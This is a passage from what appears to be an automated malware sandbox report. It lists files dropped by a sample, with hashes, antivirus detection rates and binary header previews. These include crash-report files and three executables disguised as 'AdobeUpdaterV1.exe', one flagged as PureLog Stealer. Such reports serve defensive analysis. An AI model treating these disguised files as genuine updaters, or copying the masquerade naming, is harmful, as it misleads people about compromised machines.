.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.0.f.b.7.f.1.b.4.3.7.d.2.c.0.6.d.9.5.6.3.8.5.5.d.7.9.7.a.4.1.b.b.c.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSIUpdaterV1.exe_f9eb3d1e2eda166485f639133f6bde09db46edb_bdfd7a68_a5e699bc-c9f4-45d5-a862-f27dedd08d42\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7262978341790787
Encrypted:	false
SSDEEP:	96:HmF1JbtHcfZsGtqp8XqEfN+QXIDcQNc63cErcw3q+HbHg/8BRTf3Oy1FhZAX/d5e:GZJHcfZaBQ0jzxPju1zuiFvZ24IO8d
MD5:	0F03C6F067AF43ADF17016B64525815D
SHA1:	059D0AFAF8EA8ABF8D72C7BEE5224FC42B04417E
SHA-256:	DA3C15CBA7FBE037C8444A182D1F5CF9500F91CF3050801802AEB048988D870C
SHA-512:	E8652EF19933D5D1481931C70838A1A38547EB1D23092AD5C950D4D437CDA42221F0D6B5550994032D55737AED964EC797DDB617366A97AE266942BB75F86659
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.4.4.8.4.1.1.1.5.4.6.4.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.4.4.8.4.1.1.9.5.1.5.0.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.e.6.9.9.b.c.-.c.9.f.4.-.4.5.d.5.-.a.8.6.2.-.f.2.7.d.e.d.d.0.8.d.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.f.6.0.f.6.9.-.7.7.8.f.-.4.6.3.2.-.8.3.8.7.-.6.b.d.4.7.1.2.8.8.1.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.I.U.p.d.a.t.e.r.V.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.U.T.O.F.M.T...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.3.c.-.0.0.0.1.-.0.0.1.4.-.3.4.f.2.-.6.b.a.f.7.9.9.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.0.f.b.7.f.1.b.4.3.7.d.2.c.0.6.d.9.5.6.3.8.5.5.d.7.9.7.a.4.1.b.b.c.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_v6ggwc2fJXXgIu5f_1887f2cf649886fae0c2ea234d3f8ef03762663d_678a9ce0_5061925a-09f5-43b8-b876-e8a14283e34c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7351254758910868
Encrypted:	false
SSDEEP:	96:ZtF6mG61GFGy0osHG9tqpHGfXqEfN+QXIDcQWc6XcE6cw3tdGTdGz+HbHg/8BRTh:TLi0o+tQ04TQmju1zuiFvZ24IO8ku
MD5:	F1A2AA30209D3921075AA208706B58C8
SHA1:	F1A8A74B4DD9938AEC3432FB71625284475D13FF
SHA-256:	EE6EAD9E9E5D807C305338A9CC575B66B20B4B70500E21A7B46A067B396D3727
SHA-512:	63E76C01D7AEC80A8EBBC6AAA081C64208A8F8B753452E40D985AC141C202D100E6F9FEEC70F2E814F69A8CC8A1F66CBF0D514140E8E0C4488D77DC0E8D69B70
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.4.4.8.4.0.2.0.6.1.4.1.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.4.4.8.4.0.2.6.0.8.2.9.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.6.1.9.2.5.a.-.0.9.f.5.-.4.3.b.8.-.b.8.7.6.-.e.8.a.1.4.2.8.3.e.3.4.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.d.f.8.6.9.f.-.b.d.9.b.-.4.b.c.5.-.8.d.2.e.-.e.4.f.c.9.3.0.4.1.2.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.6.g.g.w.c.2.f.J.X.X.g.I.u.5.f.z.D.Q.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.U.T.O.F.M.T...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.d.4.-.0.0.0.1.-.0.0.1.4.-.1.c.1.6.-.5.8.a.f.7.9.9.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.0.f.b.7.f.1.b.4.3.7.d.2.c.0.6.d.9.5.6.3.8.5.5.d.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9FF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 6 05:53:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44662
Entropy (8bit):	2.1377044472585913
Encrypted:	false
SSDEEP:	192:eZqWw5ORXxSA7QK3k3ncszdqbr8LK/Eo2PegIv5A7GoJwKy3W3gUfrwFh2:alRXUB3ncs5qOK/Evn7pix3cIi
MD5:	BC88459ADDA4D2E993087AA1636DC9D6
SHA1:	CC88180759C95C6C349CB1AB33B8544A879F1EBD
SHA-256:	AA7E52F654903209707458AFF009AE32A7C50B3587DAD7C37D4F969E8D24B6F5
SHA-512:	1149824562C8DED3684ED2AE409953579C53B15073A0BC9848115EE05D487AC88E94FCC98CD1239A6C474EA638EA524CE9CF5FB394D9448C7403DEC6FE2688AD
Malicious:	false
Preview:	MDMP..a..... .......Rp8f........................X...............n...........T.......8...........T......................................................................................................................eJ......x.......GenuineIntel............T...........Jp8f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA9C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.7056380617775884
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6A61y6YTTZ6zgmf+vOspD+89b+LsfjKm:R6lXJN6A6Y56zgmf+vOG+Qf/
MD5:	CF87E9538BB0B1B3F347A24E6DF4958C
SHA1:	07572DCB50FC79270669FFC9DE062F69289EE7CF
SHA-256:	AC30A064B4DC92968AA1B6C776F560D263BF40CAEC289CA48D06764D2A7923BE
SHA-512:	CDD7538E8D40B8AAAFDC99F0FB6F9889094445E3B23C17FA8C668CC0E2C9CAA68DCE4F9947323606EC2921D3496EB5AA9516F5439307182B36B954D34FB83CCB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCABC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4748
Entropy (8bit):	4.541871943466633
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI9uRWpW8VYgYm8M4JUIsFh+q8QUuQVfhehfsDwM+d:uIjfrI7QA7V0JAPQVfheFsL+d
MD5:	B94080AD1871EFCF787273426064D048
SHA1:	FA79BAEE7CE380C44D3FF77F54312F3A3B6BA86F
SHA-256:	3B814E09733C3B4A3F6A3A7796770A3E496E80AB6974C11202C794DDB746EF24
SHA-512:	BAAAB847E5F6EE344858FDC31ABB0906441320AB6D3AE10AC37412FAAD45ABC4F79113CA19707EB0BA7712AA415A832FB0EF818E0253DB266BC10DEF4D4F75DD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="310856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED75.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 6 05:53:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44694
Entropy (8bit):	2.0350498205805687
Encrypted:	false
SSDEEP:	192:X+pk7cONnwfkCp6QdBKK047GYJAAcCG85+:O2TNnwfke6QBKK7Z+AcD
MD5:	F1B5CB306C5695ED193A610509EBC880
SHA1:	9E5737CA177388F57124FC7F7194D566FE2D1956
SHA-256:	267CD51013DD14133FAA1C8B024550136F488676F1A8730C343B482CE7B54200
SHA-512:	686C1ED332F72473127A0474B79C5650AFC2E489A2FBB9CC6960611354DE96192B365D2C94580D83954830C6336C1EE535444C40DDF816CD675F2595FB6667BD
Malicious:	false
Preview:	MDMP..a..... .......[p8f........................X...............^...........T.......8...........T.......................................................................................................................eJ......x.......GenuineIntel............T.......<...Jp8f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED94.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 6 05:53:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46000
Entropy (8bit):	2.095283448097925
Encrypted:	false
SSDEEP:	192:Xc9aE+mfS0dO87UGtlWe4qQZCY3vm6Sm9hqa7GYJF/gD80EgXGtLjh:Ma8tQ87llrhQH/m6Hqa7ZMDBhs
MD5:	0F007DDA071FB5A4D93BDD8C70ACC96A
SHA1:	B4F325E7A0352AF9D775BF14A9D81547BBF00894
SHA-256:	8D9C6FCAC31BFFC64F43E59C2B108889E9B59C1477CD585DD4C632B94D23E5EE
SHA-512:	24380A7840890CDF3137C59E88F0A1BD379013B46BAFDD7BC41FA04F38E4CBCA8501F72464B7830FF48C9A8F33A5B0DFA6F8317160D48353B1442B0DDB7A40E7
Malicious:	false
Preview:	MDMP..a..... .......[p8f........................X...........4...^...........T.......8...........T.......................................................................................................................eJ......x.......GenuineIntel............T...........Qp8f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEDD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6334
Entropy (8bit):	3.7188999539521275
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbJu6NOwbrYKzURAmCgaMQUJ89b0lsf0N5cm:R6l7wVeJJu6FrYKzOBpDJ89b0lsf0Tcm
MD5:	821334C1E629DD8AF01F7F6BE3A8B4F2
SHA1:	4C05655D017BEB7C2564E65A45433616A39CF662
SHA-256:	B15E704BF59C72761BCF6F886C24651427560846455D98F52473E078C58412E8
SHA-512:	8B42F330159BC4BFDE1043FDC260F0CB3B3FF475B8F189B07C35B75788C50F9939283E1EB41CF7D15ED6BFEB52F022DC98EF7040AA33C0899ADDEB223D9A2AC4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEED.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6328
Entropy (8bit):	3.716717381082929
Encrypted:	false
SSDEEP:	192:R6l7wVeJgaa6B3YKzOBpDh89b0uqsfxcm:R6lXJgX6RYKzOa0uJff
MD5:	4BC3040B5A558A486C0AE552DC644455
SHA1:	0BE12BDAF994304FF5100976B4133982B6D2F9C5
SHA-256:	FFC6BAA3D608AFEB9B57CA375CCACC5856BE23DE8937C2C1FE4F7FD1B278D113
SHA-512:	DB65F6A420CE9A6807EF537DA0BAE8C3EED17EED256E5C29D7631CE0857E155BBD2A0DA6440D50F319744DB9BB927E033B75A32E1055DA74B8DB8E1CECE429D8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF0D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4692
Entropy (8bit):	4.500695051598491
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI9uRWpW8VYqYm8M4JTOFqP+q8Ie3QVf5chGvd:uIjfrI7QA7VmJjeQVf+wvd
MD5:	B4CB89A4FF46C091AA8EFA7FE5819DB9
SHA1:	ABC130BC02B100A18CEE69E8E3B3801519CCBA6D
SHA-256:	B23CA0F84D533A7A05D97D0B6A3192A89EF9606BA23D90BBF654B49547E060B9
SHA-512:	3FBF03EC75BB30347F9D98ECA590ACC1A12A3CCA63729917867D97B39BC2E26E9E32889B685CD9CC89B225EEF293B6E9B56B8EB23155EA73A85C1AF61A2968B6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="310856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF8B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4692
Entropy (8bit):	4.495504315311362
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI9uRWpW8VYJYm8M4JTOF++q8IuQQVf5chGpd:uIjfrI7QA7VpJ1nQVf+wpd
MD5:	9AE0183E8C0A158D925FABF8E4B8ABD9
SHA1:	86201228E2C1F230B57D8F2DF32EED3DF3600B2E
SHA-256:	7F9C678C0FCB9ED17774651C884A356250E118635C5C99168EB449CAD75C6D75
SHA-512:	19D1A910546899319BA07F55848A740D768CC193916FCEAFAD714A2C2CB7939EC99CD4655C5FD54083EAE0E9D3606D05FF1B2D1E48C73F23B838F87C427F09C3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="310856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1896048
Entropy (8bit):	7.954279347337501
Encrypted:	false
SSDEEP:	49152:Foa3d+XWOTnKjKZpLq2FDwCfy90x87tSbervz8jyrHPmr7r:FoyddOTnK0LNcDeMAerL8ebPMn
MD5:	3A2BDF3F22AF20AE6E0F2552C9301222
SHA1:	D0FB7F1B437D2C06D9563855D797A41BBCC8FEEF
SHA-256:	B7874820D3ED5758EF459882D3C3D540ACF1E6170F4EA7DC1CC6168544B18C2B
SHA-512:	FBB173F5DF2E0FD0A842E1ED3249F4BB036734105F6D2ADAE8510F25E4CCECC0FEC9737FD110E84C3EAA4F9BB3C54598320194FC51D3C471F851FF8CA2ADB847
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 60%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c,.i...i...i..C..~.i..C..~:i..C..~.i..R..~.i..R..~.i..C..~.i...i...i..R..~.i..c..~.i..c....i..c..~.i..Rich.i..........................PE..L.....6f...............'.^...v...............p....@......................................@.....................................<.......................p&..........................................0...@............p..<............................text...1\.......^.................. ..`.rdata.......p.......b..............@..@.data.... ... ......................@....bss........P......................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	483440
Entropy (8bit):	7.62615419370465
Encrypted:	false
SSDEEP:	12288:ub3IzlSJCfjT1CDcLfSsYxolZ0B3HpCO00N4:ub3gMMT1iqSRxovg3HE+4
MD5:	46C72D686C836F3C97CE18B81B0D9864
SHA1:	FDADD2E3CD971CD9FFFB3DE0F4A69ED0F77AE4A5
SHA-256:	DEAF3E009A0A9DF61E84C2BEFDB5DB10599F47C03FBDEFBBDCE83AAC3A969CD1
SHA-512:	1AB8C8967155913C5DD0E2853D663BB096571062680DE246FDDA370947F7B6C3D2F44B85BE97B821C630A4A42B3990D78601615737C3CED1418C9CCF18611208
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 30%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7f.................0...........N... ...`....@.. ....................................`..................................N..K....`..<............:..p&..........GN............................................... ............... ..H............text........ ...0.................. ..`.rsrc...<....`.......2..............@..@.reloc...............8..............@..B.................N......H.......4Q...................#...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z...(........]*....0............i. .......... .............8X........:........d....~....(......~....(....&.........8..........(...........~....(......X.. ....?........8B........ ....;...... ....;............XX.. ....]...................X.. ....?...........8.......8......X ....].....X ....]

C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6990616
Entropy (8bit):	7.983839049537993
Encrypted:	false
SSDEEP:	196608:E9NDuIIL6QK4nK4emAWV3ogzbxfZdszlydO:2EL6lsKDmztogzblZdEn
MD5:	5158FED3EE415791BB7A7A3712373383
SHA1:	B21E19150DD6DF55B4578849FC4B6266E5B90829
SHA-256:	E3EEA6EF7EF2314970047B0A887C67D780EED12D40D5931E0A3E72061DE5E746
SHA-512:	498B4F7C867181C63F6C3D3243D5ADE76EE5874B65F7273CFE0AE32B52EEED9009443A2F315A1815B45A7542C1673F2B0B5119727146BFFB91F255BF54391C28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....96f...............'.....>....................@.................................A]k...@.................................PUO.@........_...........Jj..a...................................K.......g..@.............N.......@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp....5......................... ..`.vmp..,.....N.....................@....vmp..@.\...N...\................. ..`.reloc................\.............@..@.rsrc...._.......`....\.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AdobeUpdaterV1.exe.log

Download File

Process:	C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MPGPH1.exe.log

Download File

